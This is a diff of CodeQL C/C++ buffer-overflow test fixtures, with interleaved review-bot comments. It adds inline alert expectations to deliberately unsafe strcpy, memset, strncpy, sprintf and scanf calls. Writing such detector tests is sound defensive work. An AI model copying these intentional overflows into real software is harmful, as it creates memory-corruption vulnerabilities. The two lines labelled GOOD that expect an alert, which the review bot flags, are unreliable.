@@ -633,7 +633,7 @@ char* strcpy(char *, const char *); void test24(char* source) { char buffer[100]; - strcpy(buffer, source); // BAD + strcpy(buffer, source); // BAD // $ Alert[cpp/unbounded-write] } struct my_struct { @@ -646,7 +646,7 @@ void test25(char* source) { s.home = source; char buf[100]; - strcpy(buf, s.home); // BAD + strcpy(buf, s.home); // BAD // $ Alert[cpp/unbounded-write] } void test26(bool cond) @@ -655,7 +655,7 @@ void test26(bool cond) char *ptr; int i; - if (buffer[-1] == 0) { return; } // BAD: accesses buffer[-1] + if (buffer[-1] == 0) { return; } // BAD: accesses buffer[-1] // $ Alert[cpp/overflow-buffer] ptr = buffer; if (cond) @@ -663,7 +663,7 @@ void test26(bool cond) ptr += 1; if (ptr[-1] == 0) { return; } // GOOD: accesses buffer[0] } else { - if (ptr[-1] == 0) { return; } // BAD: accesses buffer[-1] + if (ptr[-1] == 0) { return; } // BAD: accesses buffer[-1] // $ Alert[cpp/overflow-buffer] } if (ptr[-1] == 0) { return; } // BAD: accesses buffer[-1] or buffer[0] [NOT DETECTED] @@ -726,15 +726,15 @@ struct HasSomeFields { }; void test32() { - memset(&c, 0, sizeof(HasSomeFields) - offsetof(HasSomeFields, a)); // BAD + memset(&c, 0, sizeof(HasSomeFields) - offsetof(HasSomeFields, a)); // BAD // $ Alert[cpp/overflow-buffer] }; void test33() { - memset(&c, 0, sizeof(HasSomeFields) - offsetof(HasSomeFields, b)); // BAD + memset(&c, 0, sizeof(HasSomeFields) - offsetof(HasSomeFields, b)); // BAD // $ Alert[cpp/overflow-buffer] }; void test34() { - memset(&b, 0, sizeof(HasSomeFields) - offsetof(HasSomeFields, a)); // BAD + memset(&b, 0, sizeof(HasSomeFields) - offsetof(HasSomeFields, a)); // BAD // $ Alert[cpp/overflow-buffer] }; void test35() { 
@@ -745,7 +745,7 @@ struct HasSomeFields { void test36() { HasSomeFields hsf; memset(&hsf.a, 0, sizeof(HasSomeFields) - offsetof(HasSomeFields, a)); // GOOD - memset(&hsf.c, 0, sizeof(HasSomeFields) - offsetof(HasSomeFields, a)); // BAD + memset(&hsf.c, 0, sizeof(HasSomeFields) - offsetof(HasSomeFields, a)); // BAD // $ Alert[cpp/overflow-buffer] } struct AnonUnionInStruct 
@@ -771,18 +771,18 @@ struct AnonUnionInStruct memset(&a_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_2)); // GOOD memset(&a_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, d)); // GOOD - memset(&b_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_1)); // BAD + memset(&b_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_1)); // BAD // $ Alert[cpp/overflow-buffer] memset(&b_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_1)); // GOOD memset(&b_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, c_1)); // GOOD - memset(&b_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_2)); // BAD + memset(&b_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_2)); // BAD // $ Alert[cpp/overflow-buffer] memset(&b_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_2)); // GOOD memset(&b_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, d)); // GOOD - memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_1)); // BAD - memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_1)); // BAD + memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_1)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_1)); // BAD // $ Alert[cpp/overflow-buffer] memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, c_1)); // GOOD - memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_2)); // BAD - memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_2)); // GOOD + memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_2)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_2)); // GOOD // $ Alert[cpp/overflow-buffer] memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, d)); // GOOD memset(&a_2, 
0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_1)); // GOOD @@ -792,10 +792,10 @@ struct AnonUnionInStruct memset(&a_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_2)); // GOOD memset(&a_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, d)); // GOOD - memset(&b_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_1)); // BAD + memset(&b_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_1)); // BAD // $ Alert[cpp/overflow-buffer] memset(&b_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_1)); // GOOD memset(&b_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, c_1)); // GOOD - memset(&b_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_2)); // BAD + memset(&b_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_2)); // BAD // $ Alert[cpp/overflow-buffer] memset(&b_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_2)); // GOOD memset(&b_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, d)); // GOOD }; @@ -813,7 +813,7 @@ struct UnionWithoutStruct void test37() { memset(&a, 0, sizeof(UnionWithoutStruct) - offsetof(UnionWithoutStruct, a)); // GOOD memset(&a, 0, sizeof(UnionWithoutStruct) - offsetof(UnionWithoutStruct, b)); // GOOD - memset(&b, 0, sizeof(UnionWithoutStruct) - offsetof(UnionWithoutStruct, a)); // BAD + memset(&b, 0, sizeof(UnionWithoutStruct) - offsetof(UnionWithoutStruct, a)); // BAD // $ Alert[cpp/overflow-buffer] }; }; 
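Review bot: Two added expectations contradict the label on their own line: in the hunk at -771, `memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_2)); // GOOD` now expects `Alert[cpp/overflow-buffer]`, and the hunk at -864 does the same for `memset(&f.x, 0, sizeof(S2) - offsetof(S2, f)); // GOOD`. One of the two is wrong in each case, and the struct layouts that decide it are declared outside these hunks. If the write stays in bounds, tag the result as a known false positive with `// $ SPURIOUS: Alert[cpp/overflow-buffer]`; if it does overrun the member, change the label to `// BAD`. As written, the fixture accepts an overflow alert on code it describes as safe.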
@@ -840,20 +840,20 @@ struct S2 { memset(&f.inner.a, 0, sizeof(S2) - offsetof(S2, f)); // GOOD memset(&f.inner.a, 0, sizeof(S2) - offsetof(S2, u)); // GOOD - memset(&f.inner.b, 0, sizeof(S2) - offsetof(ThreeUInts, a)); // BAD + memset(&f.inner.b, 0, sizeof(S2) - offsetof(ThreeUInts, a)); // BAD // $ Alert[cpp/overflow-buffer] memset(&f.inner.b, 0, sizeof(S2) - offsetof(ThreeUInts, b)); // GOOD memset(&f.inner.b, 0, sizeof(S2) - offsetof(ThreeUInts, c)); // GOOD - memset(&f.inner.b, 0, sizeof(S2) - offsetof(FourUInts, inner)); // BAD + memset(&f.inner.b, 0, sizeof(S2) - offsetof(FourUInts, inner)); // BAD // $ Alert[cpp/overflow-buffer] memset(&f.inner.b, 0, sizeof(S2) - offsetof(FourUInts, x)); // GOOD - memset(&f.inner.b, 0, sizeof(S2) - offsetof(S2, f)); // BAD + memset(&f.inner.b, 0, sizeof(S2) - offsetof(S2, f)); // BAD // $ Alert[cpp/overflow-buffer] memset(&f.inner.b, 0, sizeof(S2) - offsetof(S2, u)); // GOOD - memset(&f.inner.c, 0, sizeof(S2) - offsetof(ThreeUInts, a)); // BAD - memset(&f.inner.c, 0, sizeof(S2) - offsetof(ThreeUInts, b)); // BAD + memset(&f.inner.c, 0, sizeof(S2) - offsetof(ThreeUInts, a)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&f.inner.c, 0, sizeof(S2) - offsetof(ThreeUInts, b)); // BAD // $ Alert[cpp/overflow-buffer] memset(&f.inner.c, 0, sizeof(S2) - offsetof(ThreeUInts, c)); // GOOD - memset(&f.inner.c, 0, sizeof(S2) - offsetof(FourUInts, inner)); // BAD + memset(&f.inner.c, 0, sizeof(S2) - offsetof(FourUInts, inner)); // BAD // $ Alert[cpp/overflow-buffer] memset(&f.inner.c, 0, sizeof(S2) - offsetof(FourUInts, x)); // GOOD - memset(&f.inner.c, 0, sizeof(S2) - offsetof(S2, f)); // BAD + memset(&f.inner.c, 0, sizeof(S2) - offsetof(S2, f)); // BAD // $ Alert[cpp/overflow-buffer] memset(&f.inner.c, 0, sizeof(S2) - offsetof(S2, u)); // GOOD memset(&f.inner, 0, sizeof(S2) - offsetof(ThreeUInts, a)); // GOOD 
@@ -864,12 +864,12 @@ struct S2 { memset(&f.inner, 0, sizeof(S2) - offsetof(S2, f)); // GOOD memset(&f.inner, 0, sizeof(S2) - offsetof(S2, u)); // GOOD - memset(&f.x, 0, sizeof(S2) - offsetof(ThreeUInts, a)); // BAD - memset(&f.x, 0, sizeof(S2) - offsetof(ThreeUInts, b)); // BAD - memset(&f.x, 0, sizeof(S2) - offsetof(ThreeUInts, c)); // BAD - memset(&f.x, 0, sizeof(S2) - offsetof(FourUInts, inner)); // BAD + memset(&f.x, 0, sizeof(S2) - offsetof(ThreeUInts, a)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&f.x, 0, sizeof(S2) - offsetof(ThreeUInts, b)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&f.x, 0, sizeof(S2) - offsetof(ThreeUInts, c)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&f.x, 0, sizeof(S2) - offsetof(FourUInts, inner)); // BAD // $ Alert[cpp/overflow-buffer] memset(&f.x, 0, sizeof(S2) - offsetof(FourUInts, x)); // GOOD - memset(&f.x, 0, sizeof(S2) - offsetof(S2, f)); // GOOD + memset(&f.x, 0, sizeof(S2) - offsetof(S2, f)); // GOOD // $ Alert[cpp/overflow-buffer] memset(&f.x, 0, sizeof(S2) - offsetof(S2, u)); // GOOD memset(&f, 0, sizeof(S2) - offsetof(ThreeUInts, a)); // GOOD 
@@ -880,12 +880,12 @@ struct S2 { memset(&f, 0, sizeof(S2) - offsetof(S2, f)); // GOOD memset(&f, 0, sizeof(S2) - offsetof(S2, u)); // GOOD - memset(&u, 0, sizeof(S2) - offsetof(ThreeUInts, a)); // BAD - memset(&u, 0, sizeof(S2) - offsetof(ThreeUInts, b)); // BAD - memset(&u, 0, sizeof(S2) - offsetof(ThreeUInts, c)); // BAD - memset(&u, 0, sizeof(S2) - offsetof(FourUInts, inner)); // BAD - memset(&u, 0, sizeof(S2) - offsetof(FourUInts, x)); // BAD - memset(&u, 0, sizeof(S2) - offsetof(S2, f)); // BAD + memset(&u, 0, sizeof(S2) - offsetof(ThreeUInts, a)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&u, 0, sizeof(S2) - offsetof(ThreeUInts, b)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&u, 0, sizeof(S2) - offsetof(ThreeUInts, c)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&u, 0, sizeof(S2) - offsetof(FourUInts, inner)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&u, 0, sizeof(S2) - offsetof(FourUInts, x)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&u, 0, sizeof(S2) - offsetof(S2, f)); // BAD // $ Alert[cpp/overflow-buffer] memset(&u, 0, sizeof(S2) - offsetof(S2, u)); // GOOD } }; @@ -981,24 +981,24 @@ void test28() { int arr[10]; int *ptr1 = arr; - ptr1[-1] = 0; // BAD: underrun write + ptr1[-1] = 0; // BAD: underrun write // $ Alert[cpp/overflow-buffer] ptr1++; ptr1[-1] = 0; // GOOD int *ptr2 = arr; - ptr2[-1] = 0; // BAD: underrun write + ptr2[-1] = 0; // BAD: underrun write // $ Alert[cpp/overflow-buffer] *ptr2++; ptr2[-1] = 0; // GOOD int *ptr3 = arr; - ptr3[-1] = 0; // BAD: underrun write + ptr3[-1] = 0; // BAD: underrun write // $ Alert[cpp/overflow-buffer] if (cond()) { ptr3++; } ptr3[-1] = 0; // GOOD (depending what cond() does) int *ptr4 = arr; - ptr4[-1] = 0; // BAD: underrun write + ptr4[-1] = 0; // BAD: underrun write // $ Alert[cpp/overflow-buffer] while (true) { ptr4++; if (cond()) break; 
@@ -1006,7 +1006,7 @@ void test28() { ptr4[-1] = 0; // GOOD int *ptr5 = arr; - ptr5[-1] = 0; // BAD: underrun write + ptr5[-1] = 0; // BAD: underrun write // $ Alert[cpp/overflow-buffer] while (true) { if (cond()) ptr5++; if (cond()) break; @@ -1028,7 +1028,7 @@ void test29() { memset(ptr->arr1, 0, sizeof(ptr->arr1) + sizeof(ptr->arr2)); // GOOD (overwrites arr1, arr2) memset(&(ptr->arr1[0]), 0, sizeof(ptr->arr1) + sizeof(ptr->arr2)); // GOOD (overwrites arr1, arr2) - memset(ptr->arr1, 0, sizeof(ptr->arr1) + sizeof(ptr->arr2) + 10); // BAD + memset(ptr->arr1, 0, sizeof(ptr->arr1) + sizeof(ptr->arr2) + 10); // BAD // $ Alert[cpp/overflow-buffer] } struct UnionStruct { @@ -1047,14 +1047,14 @@ void test30() { UnionStruct us; memset(us.buffer1, 0, sizeof(us.buffer1)); // GOOD - memset(us.buffer1, 0, sizeof(us)); // BAD + memset(us.buffer1, 0, sizeof(us)); // BAD // $ Alert[cpp/overflow-buffer] memset(us.buffer2, 0, sizeof(us.buffer2)); // GOOD - memset(us.buffer2, 0, sizeof(us)); // BAD + memset(us.buffer2, 0, sizeof(us)); // BAD // $ Alert[cpp/overflow-buffer] strncpy(us.buffer1, "", sizeof(us.buffer1) - 1); // GOOD - strncpy(us.buffer1, "", sizeof(us) - 1); // BAD + strncpy(us.buffer1, "", sizeof(us) - 1); // BAD // $ Alert[cpp/badly-bounded-write] Alert[cpp/overflow-buffer] Alert[cpp/static-buffer-overflow] strncpy(us.buffer2, "", sizeof(us.buffer2) - 1); // GOOD - strncpy(us.buffer2, "", sizeof(us) - 1); // BAD + strncpy(us.buffer2, "", sizeof(us) - 1); // BAD // $ Alert[cpp/badly-bounded-write] Alert[cpp/overflow-buffer] Alert[cpp/static-buffer-overflow] } struct S_Size16 { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/tests_restrict.c b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/tests_restrict.c index 96a5571bf657..a081e77a7848 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/tests_restrict.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/tests_restrict.c 
@@ -9,7 +9,7 @@ char smallbuf[1], largebuf[2]; void test1() { memcpy(largebuf, smallbuf, 1); // GOOD - memcpy(largebuf, smallbuf, 2); // BAD: source over-read + memcpy(largebuf, smallbuf, 2); // BAD: source over-read // $ Alert[cpp/overflow-buffer] } int tests_restrict_main(int argc, char *argv[]) diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/unions.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/unions.cpp index bac7abb5187c..dc1e17d89794 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/unions.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/unions.cpp @@ -23,15 +23,15 @@ void myUnionTest() memset(&mu, 0, sizeof(mu)); memset(&mu, 0, sizeof(mu.small)); memset(&mu, 0, sizeof(mu.large)); - memset(&mu, 0, 200); // BAD + memset(&mu, 0, 200); // BAD // $ Alert[cpp/overflow-buffer] memset(&(mu.small), 0, sizeof(mu)); // (dubious) memset(&(mu.small), 0, sizeof(mu.small)); memset(&(mu.small), 0, sizeof(mu.large)); // (dubious) - memset(&(mu.small), 0, 200); // BAD + memset(&(mu.small), 0, 200); // BAD // $ Alert[cpp/overflow-buffer] memset(&(mu.large), 0, sizeof(mu)); memset(&(mu.large), 0, sizeof(mu.small)); // (dubious) memset(&(mu.large), 0, sizeof(mu.large)); - memset(&(mu.large), 0, 200); // BAD + memset(&(mu.large), 0, 200); // BAD // $ Alert[cpp/overflow-buffer] } // --- diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/var_size_struct.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/var_size_struct.cpp index d4fe3da48bd9..48af54182021 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/var_size_struct.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/var_size_struct.cpp 
@@ -68,9 +68,9 @@ void testVarStruct1() { vs1->amount = 1024; memset(vs1->data, 0, 1024); // GOOD - memset(vs1->data, 0, 1025); // BAD: buffer overflow + memset(vs1->data, 0, 1025); // BAD: buffer overflow // $ Alert[cpp/overflow-buffer] strncpy(vs1->data, "Hello, world!", 1024); // GOOD - strncpy(vs1->data, "Hello, world!", 1025); // BAD + strncpy(vs1->data, "Hello, world!", 1025); // BAD // $ Alert[cpp/badly-bounded-write] Alert[cpp/overflow-buffer] } struct varStruct2 { @@ -84,7 +84,7 @@ void testVarStruct2() { vs2->size = 16; vs2->elements[15] = 0; // GOOD - vs2->elements[16] = 0; // BAD: buffer overflow + vs2->elements[16] = 0; // BAD: buffer overflow // $ Alert[cpp/overflow-buffer] } struct notVarStruct1 { @@ -96,11 +96,11 @@ void testNotVarStruct1() { notVarStruct1 *nvs1 = (notVarStruct1 *)malloc(sizeof(notVarStruct1) * 2); memset(nvs1->str, 0, 128); // GOOD - memset(nvs1->str, 0, 129); // DUBIOUS: buffer overflow (overflows nvs1->str but not nvs1 overall) + memset(nvs1->str, 0, 129); // DUBIOUS: buffer overflow (overflows nvs1->str but not nvs1 overall) // $ Alert[cpp/overflow-buffer] memset(nvs1[1].str, 0, 128); // GOOD memset(nvs1[1].str, 0, 129); // BAD: buffer overflow [NOT DETECTED] strncpy(nvs1->str, "Hello, world!", 128); // GOOD - strncpy(nvs1->str, "Hello, world!", 129); // BAD + strncpy(nvs1->str, "Hello, world!", 129); // BAD // $ Alert[cpp/badly-bounded-write] Alert[cpp/overflow-buffer] Alert[cpp/static-buffer-overflow] } struct notVarStruct2 { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/UnsafeUseOfStrcat/UnsafeUseOfStrcat.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/UnsafeUseOfStrcat/UnsafeUseOfStrcat.qlref index 9790cddebab5..7f1a1cf35f2d 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/UnsafeUseOfStrcat/UnsafeUseOfStrcat.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/UnsafeUseOfStrcat/UnsafeUseOfStrcat.qlref 
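Review bot: The context line `memset(nvs1[1].str, 0, 129); // BAD: buffer overflow [NOT DETECTED]` in the `@@ -96,11 +96,11 @@` hunk gets no inline expectation, so the known false negative stays recorded only as free text while every detected case around it is now machine-checked. It could be encoded as `// $ MISSING: Alert[cpp/overflow-buffer]` (query id assumed from the neighbouring lines), which makes the test report the annotation as fixed once the query starts catching the overflow. The same applies to the `[NOT DETECTED]` context lines in the unions.c hunk `@@ -23,8 +23,8 @@` and the varbuffer.c hunk `@@ -57,13 +57,13 @@`, where the neighbouring expectations use `cpp/very-likely-overrunning-write`. Tracking these gaps in the expectations keeps missed overflows visible to whoever next tunes the queries.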
@@ -1 +1,2 @@ -Likely Bugs/Memory Management/UnsafeUseOfStrcat.ql +query: Likely Bugs/Memory Management/UnsafeUseOfStrcat.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/UnsafeUseOfStrcat/test.c b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/UnsafeUseOfStrcat/test.c index c670533f9aff..cf3edad43db1 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/UnsafeUseOfStrcat/test.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/UnsafeUseOfStrcat/test.c @@ -17,7 +17,7 @@ void free(void *ptr); static void bad0(char *s) { char buf[80]; strcpy(buf, "s: "); - strcat(buf, s); // BAD -- s may be too long and overflow the buffer + strcat(buf, s); // BAD -- s may be too long and overflow the buffer // $ Alert } static void good0(char *s) { @@ -30,7 +30,7 @@ static void good0(char *s) { static void bad1(char *s, int len) { char *buf = malloc(len+4); strcpy(buf, "s: "); - strcat(buf, s); // BAD -- s may be too long and overflow the buffer + strcat(buf, s); // BAD -- s may be too long and overflow the buffer // $ Alert } static void good1(char *s, int len) { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.qlref index 9636c74d0a8f..76b6e5900218 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/BadlyBoundedWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/BadlyBoundedWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/OverrunWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/OverrunWrite.qlref index f6c962c1a7b4..18ae0f2a567b 100644 
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/OverrunWrite.qlref
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/OverrunWrite.qlref
@@ -1 +1,2 @@
-Security/CWE/CWE-120/OverrunWrite.ql
\ No newline at end of file
+query: Security/CWE/CWE-120/OverrunWrite.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/OverrunWriteFloat.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/OverrunWriteFloat.qlref
index 757d1592e830..ba8f6a96a1fd 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/OverrunWriteFloat.qlref
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/OverrunWriteFloat.qlref
@@ -1 +1,2 @@
-Security/CWE/CWE-120/OverrunWriteFloat.ql
\ No newline at end of file
+query: Security/CWE/CWE-120/OverrunWriteFloat.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.expected
index 0ebcbb8cde4e..b4834cc6dc70 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.expected
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.expected
@@ -1,3 +1,9 @@ +#select +| tests.c:28:3:28:9 | call to sprintf | tests.c:16:26:16:29 | **argv | tests.c:28:22:28:28 | *access to array | This 'call to sprintf' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | +| tests.c:29:3:29:9 | call to sprintf | tests.c:16:26:16:29 | **argv | tests.c:29:28:29:34 | *access to array | This 'call to sprintf' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | +| tests.c:31:15:31:23 | buffer100 | tests.c:31:15:31:23 | scanf output argument | tests.c:31:15:31:23 | scanf output argument | This 'scanf string argument' with input from $@ may overflow the destination. | tests.c:31:15:31:23 | scanf output argument | value read by scanf | +| tests.c:33:21:33:29 | buffer100 | tests.c:33:21:33:29 | scanf output argument | tests.c:33:21:33:29 | scanf output argument | This 'scanf string argument' with input from $@ may overflow the destination. | tests.c:33:21:33:29 | scanf output argument | value read by scanf | +| tests.c:34:25:34:33 | buffer100 | tests.c:16:26:16:29 | **argv | tests.c:34:10:34:16 | *access to array | This 'sscanf string argument' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | edges | tests.c:16:26:16:29 | **argv | tests.c:28:22:28:28 | *access to array | provenance | | | tests.c:16:26:16:29 | **argv | tests.c:29:28:29:34 | *access to array | provenance | | 
@@ -10,9 +16,3 @@ nodes | tests.c:33:21:33:29 | scanf output argument | semmle.label | scanf output argument | | tests.c:34:10:34:16 | *access to array | semmle.label | *access to array | subpaths -#select -| tests.c:28:3:28:9 | call to sprintf | tests.c:16:26:16:29 | **argv | tests.c:28:22:28:28 | *access to array | This 'call to sprintf' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | -| tests.c:29:3:29:9 | call to sprintf | tests.c:16:26:16:29 | **argv | tests.c:29:28:29:34 | *access to array | This 'call to sprintf' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | -| tests.c:31:15:31:23 | buffer100 | tests.c:31:15:31:23 | scanf output argument | tests.c:31:15:31:23 | scanf output argument | This 'scanf string argument' with input from $@ may overflow the destination. | tests.c:31:15:31:23 | scanf output argument | value read by scanf | -| tests.c:33:21:33:29 | buffer100 | tests.c:33:21:33:29 | scanf output argument | tests.c:33:21:33:29 | scanf output argument | This 'scanf string argument' with input from $@ may overflow the destination. | tests.c:33:21:33:29 | scanf output argument | value read by scanf | -| tests.c:34:25:34:33 | buffer100 | tests.c:16:26:16:29 | **argv | tests.c:34:10:34:16 | *access to array | This 'sscanf string argument' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.qlref index 767f2ea4db9d..36c47957d339 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.qlref 
@@ -1 +1,2 @@ -Security/CWE/CWE-120/UnboundedWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/UnboundedWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/VeryLikelyOverrunWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/VeryLikelyOverrunWrite.qlref index 94b53951c4b7..8dcc2f70c2f6 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/VeryLikelyOverrunWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/VeryLikelyOverrunWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/VeryLikelyOverrunWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/VeryLikelyOverrunWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/tests.c b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/tests.c index 5d37ff374ba3..3919367d26a4 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/tests.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/tests.c @@ -13,7 +13,7 @@ int sscanf(const char *s, const char *format, ...); //// Test code ///// -int main(int argc, char *argv[]) +int main(int argc, char *argv[]) // $ Source[cpp/unbounded-write] { if (argc < 1) { 
@@ -25,13 +25,13 @@ int main(int argc, char *argv[]) char buffer100[100]; int i; - sprintf(buffer100, argv[0]); // BAD: argv[0] could be more than 100 characters - sprintf(buffer100, "%s", argv[0]); // BAD: argv[0] could be more than 100 characters + sprintf(buffer100, argv[0]); // BAD: argv[0] could be more than 100 characters // $ Alert[cpp/unbounded-write] + sprintf(buffer100, "%s", argv[0]); // BAD: argv[0] could be more than 100 characters // $ Alert[cpp/unbounded-write] - scanf("%s", buffer100); // BAD: the input could be more than 100 characters + scanf("%s", buffer100); // BAD: the input could be more than 100 characters // $ Alert[cpp/unbounded-write] scanf("%i", i); // GOOD: no problems with non-strings - scanf("%i %s", i, buffer100); // BAD: second format parameter may overflow - sscanf(argv[0], "%s", buffer100); // BAD: argv[0] could be more than 100 characters + scanf("%i %s", i, buffer100); // BAD: second format parameter may overflow // $ Alert[cpp/unbounded-write] + sscanf(argv[0], "%s", buffer100); // BAD: argv[0] could be more than 100 characters // $ Alert[cpp/unbounded-write] } // Test cases for BadlyBoundedWrite.ql @@ -40,10 +40,10 @@ int main(int argc, char *argv[]) snprintf(buffer110, 109, argv[0]); // GOOD snprintf(buffer110, 110, argv[0]); // GOOD - snprintf(buffer110, 111, argv[0]); // BAD: this could still overrun the 110 character buffer + snprintf(buffer110, 111, 